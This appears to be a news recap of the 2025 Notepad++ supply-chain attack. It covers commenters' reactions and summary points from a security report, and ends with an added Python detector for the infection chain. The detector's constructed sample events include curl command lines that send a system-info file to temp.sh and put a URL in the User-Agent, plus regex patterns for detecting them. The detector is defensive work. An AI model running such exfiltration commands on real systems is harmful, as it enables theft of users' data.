February 3, 2026
Trust the update? Trust nothing?
Notepad++ supply chain attack breakdown
Update roulette: Notepad++ hack has users joking, raging, and sandboxing
TLDR: Hackers hijacked Notepad++ updates in 2025 and rotated sneaky downloads to hit a few targeted machines, though security tools report blocking many attempts. Commenters are split between updating everything, updating nothing, or sandboxing apps—while debating if package managers fix trust or just move the risk.
Hackers slipped malicious updates into Notepad++ last year, rotating servers and sneaky payloads while targeting a small list of victims across Vietnam, El Salvador, Australia, and a Philippine government office. The devs say it started with a hosting-provider mishap; researchers like Kaspersky say their tools stopped the attacks in the wild. But the real fireworks? The comments.
One camp is spiraling over the paradox: update to stay safe vs. don’t update to avoid poisoned updates. As user troad groaned, it’s now “best practice” to do both. Cue the meme storm: “Schrödinger’s Update” and “This Is Fine” dog sipping coffee while Windows auto-updates. Others are fighting back with personal fortress strategies—sandbox everything—as ashishb vows to keep apps fenced in so they can’t snoop cloud drives or cookie jars.
Then came the spice. bluenose69 side-eyed the headline’s claim that Notepad++ is “popular among developers,” lighting a mini culture war: Team N++ nostalgia vs. Team “who still uses that?” Meanwhile, porise planted a flag for package managers—the app store–style installers—declaring they “win in the end,” prompting a brawl over whether centralizing trust reduces risk or just moves the single point of failure.
Amid the drama, one curious voice asked if the stolen system info (like user names and running apps) even matters. The crowd answered: yes—reconnaissance is foreplay for bigger hacks. Bottom line: Notepad++ had a bad season, the internet had a worse debate, and everyone’s second-guessing the “Update” button on sight. Read the devs’ note here.
Key Points
- Notepad++ update infrastructure was compromised via a hosting provider incident (June–Sept 2025), with attacker access persisting until Dec 2025.
- Attackers rotated C2 servers, downloaders, and payloads across three infection chains (July–Oct 2025), targeting ~12 machines across several countries and sectors.
- Kaspersky reports its solutions blocked the attacks and publishes previously unseen IoCs related to the incident.
- Chain #1 delivered a malicious update.exe (NSIS installer) via GUP.exe, collected system info, uploaded it to temp.sh via curl, and signaled the URL in the User-Agent.
- The installer dropped multiple files, including legitimate ProShow.exe, which was abused to execute the final malicious payload.
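The chain #1 behaviour above (GUP.exe launching update.exe, which runs curl to push collected data to temp.sh and signals the URL in the User-Agent) is the kind of parent/child pattern endpoint telemetry can catch. The detector below is an added example, not code from the page, Kaspersky, or the Notepad++ project; the event field names are an assumption modelled loosely on Sysmon-style process-creation logs, and all sample events are constructed.

```python
# Added example (not from the page or the Notepad++ project): flags the
# chain-#1 behaviour the page describes in constructed process events:
# a curl run somewhere under GUP.exe that uploads to temp.sh or carries a
# URL in its User-Agent. Field names are an assumption, not a real schema.
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # executable file name
    cmdline: str   # full command line
# Constructed sample telemetry; none of these values are real IoCs.
EVENTS = [
    ProcEvent(100, 1, "notepad++.exe", "notepad++.exe"),
    ProcEvent(101, 100, "GUP.exe", "GUP.exe -updateAvailable"),
    ProcEvent(102, 101, "update.exe", "update.exe /S"),
    ProcEvent(103, 102, "curl.exe",
              'curl.exe -F "file=@C:\\Users\\Public\\sysinfo.txt" https://temp.sh/upload'),
    ProcEvent(104, 102, "curl.exe",
              'curl.exe -A "https://temp.sh/abc123/sysinfo.txt" https://example.invalid/'),
    ProcEvent(200, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(201, 200, "curl.exe", "curl.exe -O https://example.invalid/readme.txt"),
]
PASTE_HOST = re.compile(r"https?://temp\.sh/", re.IGNORECASE)
URL_IN_UA = re.compile(r'(?:-A|--user-agent)\s+"?https?://', re.IGNORECASE)

def ancestors(ev, by_pid):
    """Image names of ev's parent chain (lower-cased), nearest parent first."""
    chain, cur = [], by_pid.get(ev.ppid)
    while cur is not None:
        chain.append(cur.image.lower())
        cur = by_pid.get(cur.ppid)
    return chain

def find_suspicious(events):
    """Return (pid, reason) for curl processes descended from GUP.exe that
    upload to temp.sh or smuggle a URL in the User-Agent header."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        if ev.image.lower() != "curl.exe" or "gup.exe" not in ancestors(ev, by_pid):
            continue  # only curl launched somewhere under the updater is interesting
        if PASTE_HOST.search(ev.cmdline):
            hits.append((ev.pid, "upload to temp.sh from updater descendant"))
        if URL_IN_UA.search(ev.cmdline):
            hits.append((ev.pid, "URL smuggled in User-Agent"))
    return hits
```

The unrelated curl launched from explorer.exe is left alone; only the two curl processes under the updater are reported, one of them twice because its User-Agent is itself the temp.sh URL.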